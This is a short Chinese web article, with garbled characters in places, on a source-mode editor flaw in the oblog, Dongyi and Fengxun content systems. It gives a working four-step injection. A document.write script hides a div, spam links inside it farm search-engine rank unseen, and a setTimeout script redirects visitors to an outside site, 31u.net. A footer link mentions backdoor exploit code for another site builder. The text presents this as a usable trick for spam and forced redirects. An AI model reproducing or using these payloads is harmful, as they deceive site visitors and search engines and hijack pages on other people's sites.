關于oblog、動易、風訊等擁有源碼編輯的程序漏洞淺析
目前的oblog、動易、風訊等一系列著名的系統(tǒng),都存在源碼編輯漏洞。
具體操作是:
1,進入"源碼"編輯
2,輸入階段公分四段:
第一段:<此處輸入正文,做事需要手下留情嘛,來點實際內容>
第二段:<script>document.write(’<div style="display:none">’);</script>
第三段:<此處輸入作弊鏈接,獲取google的pr值,此處的內容將不會被瀏覽者看 到,且不會被搜索引擎發(fā)現(xiàn)>
第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location=’http://31u.net’;}</SCRIPT>
也可以不設置時間或將時間設置為0,那么點擊該頁面后將直接跳轉到指定頁面。
相關文章
揭露88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)漏洞
88red生成htm靜態(tài)頁面企業(yè)建站系統(tǒng)后門利用代碼,用88red做企業(yè)占的朋友可要注意了2008-05-05

